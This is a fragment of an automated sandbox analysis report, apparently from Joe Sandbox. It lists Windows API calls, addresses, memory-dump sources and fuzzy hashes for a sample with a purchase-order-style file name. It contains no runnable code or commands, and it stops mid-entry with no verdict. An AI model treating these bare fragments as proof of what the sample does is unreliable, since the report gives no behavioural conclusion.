                                                                  • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                  • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                  • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                  • String ID:
                                                                  • API String ID: 2782032738-0
                                                                  • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                  • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                  • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                  • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                  APIs
                                                                  • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                  • GetWindowRect.USER32(?,?), ref: 00441722
                                                                  • PtInRect.USER32(?,?,?), ref: 00441734
                                                                  • MessageBeep.USER32(00000000), ref: 004417AD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                  • String ID:
                                                                  • API String ID: 1352109105-0
                                                                  • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                  • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                  • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                  • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                  APIs
                                                                  • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                  • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                  • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                  • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                                  • String ID:
                                                                  • API String ID: 3321077145-0
                                                                  • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                  • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                  • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                  • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                  • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                  • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                  • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                  • String ID:
                                                                  • API String ID: 3058430110-0
                                                                  • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                  • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                                  • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                  • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 004503C8
                                                                  • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                  • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                  • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Proc$Parent
                                                                  • String ID:
                                                                  • API String ID: 2351499541-0
                                                                  • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                  • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                  • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                  • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                                  APIs
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                  • TranslateMessage.USER32(?), ref: 00442B01
                                                                  • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Peek$DispatchTranslate
                                                                  • String ID:
                                                                  • API String ID: 1795658109-0
                                                                  • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                  • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                  • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                  • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                  APIs
                                                                  • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                                    • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                    • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                    • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                  • GetCaretPos.USER32(?), ref: 004743B2
                                                                  • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                  • GetForegroundWindow.USER32 ref: 004743EE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                  • String ID:
                                                                  • API String ID: 2759813231-0
                                                                  • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                  • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                  • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                  • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                  APIs
                                                                    • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                  • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                  • _wcslen.LIBCMT ref: 00449519
                                                                  • _wcslen.LIBCMT ref: 00449526
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend_wcslen$_wcspbrk
                                                                  • String ID:
                                                                  • API String ID: 2886238975-0
                                                                  • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                  • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                                  • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                  • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __setmode$DebugOutputString_fprintf
                                                                  • String ID:
                                                                  • API String ID: 1792727568-0
                                                                  • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                  • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                  • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                  • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                  APIs
                                                                    • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Long$AttributesLayered
                                                                  • String ID:
                                                                  • API String ID: 2169480361-0
                                                                  • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                  • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                  • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                  • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                  APIs
                                                                    • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                    • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                    • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                  • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                  • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                  • String ID: cdecl
                                                                  • API String ID: 3850814276-3896280584
                                                                  • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                                  • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                  • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                                  • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                  APIs
                                                                    • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                  • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                                  • _memmove.LIBCMT ref: 0046D475
                                                                  • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                                  • String ID:
                                                                  • API String ID: 2502553879-0
                                                                  • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                  • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                                  • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                  • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                                  APIs
                                                                  • SendMessageW.USER32 ref: 00448C69
                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                                  • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                                  • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$LongWindow
                                                                  • String ID:
                                                                  • API String ID: 312131281-0
                                                                  • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                  • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                  • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                  • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
APIs
• select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
• __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
• accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
• WSAGetLastError.WSOCK32(00000000), ref: 00458B03
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: ErrorLastacceptselect
• String ID:
• API String ID: 385091864-0
• Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
• Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
• Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
• Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
• Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
• Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
• Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
• GetStockObject.GDI32(00000011), ref: 00430258
